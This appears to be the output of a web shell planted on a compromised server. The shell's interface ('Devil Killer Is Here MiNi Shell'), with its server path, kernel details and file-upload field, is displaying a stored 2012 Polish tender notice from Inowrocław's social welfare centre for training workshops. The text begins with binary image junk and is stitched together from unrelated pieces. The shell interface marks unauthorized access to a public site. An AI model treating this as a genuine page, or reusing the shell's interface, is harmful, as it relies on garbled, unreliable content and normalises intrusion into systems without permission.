JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120621/214322-N-2012.html

<p class="kh_header"><b>Inowrocław: Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej,
współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 214322 - 2012; data zamieszczenia: 21.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Św. Ducha 90, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3571031, faks 52 3552450.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej,
współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi szkoleniowe polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w tym:
Część 1 - Warsztaty pokonać stres pozytywnymi emocjami dla 100 osób.
		25 godzin lekcyjnych dla każdej z grup (łącznie 125 godzin lekcyjnych). Zajęcia prowadzone będą  w 5 grupach:
	                a) dwóch grupach 18-osobowych (kobiety bezrobotne, bezradne w sprawach   opiekuńczo-wychowawczych  i prowadzeniu gospodarstwa domowego),    w terminie  17-21.09.2012 r.,
	                b) trzech grupach, w tym: grupa A - 17 osób, grupa B - 23 osoby, grupa C -24 osoby, (osoby niepełnosprawne z lekkim i umiarkowanym stopniem niepełnosprawności - 30 kobiet i 34 mężczyzn), w terminie 23-27.07.2012 r. (2 grupy - B i C) i 6-10.08.2012 r. (1 grupa - A). Wśród  uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych.
Część 2 - Warsztaty domowej przedsiębiorczości dla 36 osób.
	             25 godzin lekcyjnych dla każdej z grup (łącznie 50 godzin lekcyjnych) - kobiet bezrobotnych, bezradnych w sprawach opiekuńczo-wychowawczych                         i prowadzeniu gospodarstwa domowego. Zajęcia prowadzone będą w 2 grupach 18 - osobowych, w terminie 6-10.08.2012 r.
Część 3 - Indywidualne konsultacje pedagogiczne dla 75 osób, w tym:
	               A. 4 godziny lekcyjne na osobę dla 64 osób niepełnosprawnych                                      (30 kobiet i 34 mężczyzn), w tym:
	                   a) grupa A: (17 osób z lekkim stopniem niepełnosprawności - wśród   uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 3-6.09.2012 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i w terminie 24-27.09.2012 r. (drugie spotkanie - 2 godziny lekcyjne na osobę);
 	                   b) grupa B: (23 osoby z umiarkowanym stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 27-31.08.2012 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i w terminie               17-21.09.2012 r. (drugie spotkanie - 2 godziny lekcyjne na osobę);
	                   c) grupa C: (24 osoby z umiarkowanym stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 20-24.08.2012 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i w terminie                   10-14.09.2012 r. (drugie spotkanie - 2 godziny lekcyjne na osobę),
		B. 6 godzin lekcyjnych na osobę dla 11 kobiet bezrobotnych,                                    w następujących terminach:
		a) 13,14,16,17.08.2012 r. (pierwsze spotkanie - 2 godziny lekcyjne),
		b) 27-31.08.2012 r. (drugie spotkanie - 2 godziny lekcyjne),
		c) 3-7.09.2012 r. (trzecie spotkanie - 2 godziny lekcyjne).
Część  4 -  Warsztaty planowania kariery zawodowej.
	                20 godzin lekcyjnych dla grupy 25 osób - młodzież w wieku 15-25 lat                   (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w terminie: 23-26.07.2012 r. 
Część   5 -  Warsztaty przygotowania do życia w rodzinie.
	               25 godzin lekcyjnych dla grupy 25 osób - młodzież w wieku 15-25 lat                  (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w terminie: 6-10.08.2012 r. 
Część 6 - Trening  psychodramy.
Po 5 godzin lekcyjnych dla 5 grup - łącznie 25 godzin lekcyjnych dla 25 osób -młodzież w wieku 15-25 lat (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w terminie: 20-24.08.2012 r. (codziennie inna grupa).
Część 7 - Warsztaty promocji zdrowia wraz z indywidualną konsultacją dietetyka 
dla 64 osób niepełnosprawnych (30 kobiet i 34 mężczyzn).
20  godzin lekcyjnych dla każdej z grup (łącznie 60 godzin lekcyjnych warsztatów) + 64 godziny zegarowe indywidualnych konsultacji dietetyka. Zajęcia warsztatowe prowadzone będą w trzech grupach:
a) grupa A: (17 osób z lekkim stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 20-23.08.2012 r. (warsztaty) i 27-31.08.2012 r. (ind. konsultacje);
b) grupa B: (23 osoby z umiarkowanym stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w termie 13-17.08.2012 r. (warsztaty- bez 15.08.) i 20-24.08.2012 r. (ind. konsultacje);
c) grupa C: (24 osoby z umiarkowanym stopniem niepełnosprawności - wśród uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych), w terminie 27-30.08.2012 r. (warsztaty) i 3-6.09.2012 r. (ind. konsultacje). 
2.	Do Wykonawcy należy zapewnienie pomieszczeń, w których będą odbywać się szkolenia wyposażonych w pomoce dydaktyczne, zgodnie z wymaganiami Zamawiającego, opisanymi w załączniku nr 1 do SIWZ oraz zapewnienie poczęstunku.
Zamawiający zastrzega prawo zmiany ilości uczestników szkoleń w przypadku przerwania lub zakończenia udziału w projekcie lub z powodu innych okoliczności uniemożliwiających uczestnikom szkolenia udział w zajęciach. 
3. Szczegółowy opis przedmiotu zamówienia i wymagania Zamawiającego są zawarte w załączniku nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali usługi szkoleniowe, polegające na zorganizowaniu i przeprowadzeniu szkoleń/ warsztatów/ kursów o zbliżonej tematyce do zamawianych, w tym: 
cz. 1 - co najmniej jednego o tematyce pokonać stres pozytywnymi emocjami (lub o podobnej tematyce);
cz. 2 - co najmniej jednego w zakresie warsztatów domowej przedsiębiorczości (lub o podobnej tematyce);
cz. 3 - co najmniej jednego w zakresie indywidualnych konsultacji pedagogicznych (lub o podobnej tematyce); 
cz. 4 - co najmniej jednego w zakresie warsztatów planowania kariery zawodowej (lub o podobnej tematyce);
cz. 5 - co najmniej jednego w zakresie warsztatów przygotowania do życia w rodzinie  (lub o podobnej tematyce);
cz. 6 - co najmniej jednego o tematyce trening psychodramy (lub o podobnej tematyce);
cz. 7 - co najmniej jednego w zakresie warsztatów promocji zdrowia wraz                            z indywidualną konsultacją dietetyka  (lub o podobnej tematyce).
Spełnianie warunku nastąpi na podstawie  złożonego  wykazu wykonanych usług (załącznik nr 6 do SIWZ) oraz dokumentów potwierdzających, że usługi te zostały wykonane należycie; na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować do dnia zawarcia umowy  pomieszczeniami do przeprowadzenia szkoleń.
Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia (załącznik nr 9 do SIWZ) na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia:
dla części 1 zamówienia
- co najmniej 1 osoby posiadające wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. pokonać stres pozytywnymi emocjami. 
dla części 2 zamówienia
- co najmniej 1 osoba posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. warsztaty domowej przedsiębiorczości. 
dla części 3  zamówienia
- co najmniej 2 osoby posiadające wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń w zakresie indywidualnych konsultacji pedagogicznych lub o podobnej tematyce. 
dla części 4 zamówienia
- co najmniej 1 osoba posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. warsztaty planowania kariery zawodowej. 
dla części 5 zamówienia
- co najmniej 2 osoby, w tym 1 posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. warsztaty przygotowania do życia w rodzinie oraz 1 seksuolog.  
dla części 6 zamówienia
- co najmniej 1 osoba posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. trening psychodramy. 
dla części 7 zamówienia
- co najmniej 2 osoby, w tym 1 posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. warsztaty promocji zdrowia oraz 1 dietetyk.  
Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu osób uczestniczących w wykonywaniu zamówienia oraz oświadczenia, że wymienione osoby posiadają wymagane uprawnienia; na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) opis programów oferowanych szkoleń z uwzględnieniem zakresu przedmiotu   zamówienia i wymagań Zamawiającego, wzór opisu -  zał. nr 10 do SIWZ,
2)  kalkulacja kosztów szkolenia, wg wzoru - zał. nr 8 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy - wzór zał. nr 2 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie zawodowe - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) zmiany ilości uczestników szkoleń, w przypadku przerwania lub zakończenia przez uczestnika udziału w projekcie. W ww. przypadku  pomniejsza się cenę  brutto za zakładaną/szacunkową ilość osób/uczestników o koszty  za osobę/y, które przerwały lub zakończyły udział w projekcie lub z powodu innych okoliczności uniemożliwiających uczestnikom szkolenia udział w zajęciach.  Zamawiający zapłaci za osoby, które ukończyły szkolenia;
b) zmiany terminów wykonania szkoleń, z przyczyn nieleżących po stronie Wykonawcy;
c) zmiany miejsca prowadzenia zajęć szkoleń, z przyczyn niezależnych od Wykonawcy (np. wypowiedzenie umowy najmu użyczenia lokalu, powódź). Przy czym nowe pomieszczenie/a muszą znajdować się w Inowrocławiu  i spełniać wszystkie wymagane przez Zamawiającego wymagania;
d) zmiany harmonogramów w uzasadnionych przypadkach;
e) zmiany osób przeprowadzających szkolenie w uzasadnionych wypadkach, z tym, że inne osoby nie mogą posiadać  niższych kwalifikacji;
f) zmiana warunków finansowania,
g) zmiany podatku od towarów i usług VAT;
h) zmiany programów szkoleń, w uzasadnionych przypadkach</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsinowroclaw.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej, ul. Św. Ducha 90, 88-100 Inowrocław, pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej, ul. Św. Ducha 90, 88-100 Inowrocław, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie wpółfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego; 2. Termin wykonania zamówienia: 
Część   I -  od 23.07.2012r. do 21.09.2012 r. 
Część  II -  od 06.08.2012 r. do 10.08.2012 r. 
Część III -  od 13.08.2012r. do 27.09.2012 r.
Część IV -  od 23.07.2012r. do 26.07.2012 r.
Część   V -  od 06.08.2012r. do 10.08.2012 r.
Część VI -  od 20.08.2012r. do 24.08.2012 r.
Część VII -  od 13.08.2012r. do 06.09.2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - cz. I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty pokonać stres pozytywnymi emocjami dla 100 osób.
		25 godzin lekcyjnych dla każdej z grup (łącznie 125 godzin lekcyjnych). Zajęcia prowadzone będą  w 5 grupach:
	                a) dwóch grupach 18-osobowych (kobiety bezrobotne, bezradne w sprawach   opiekuńczo-wychowawczych  i prowadzeniu gospodarstwa domowego),    w terminie  17-21.09.2012 r.,
	                b) trzech grupach, w tym: grupa A - 17 osób, grupa B - 23 osoby, grupa C -24 osoby, (osoby niepełnosprawne z lekkim i umiarkowanym stopniem niepełnosprawności - 30 kobiet i 34 mężczyzn), w terminie 23-27.07.2012 r. (2 grupy - B i C) i 6-10.08.2012 r. (1 grupa - A). Wśród  uczestników nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych.
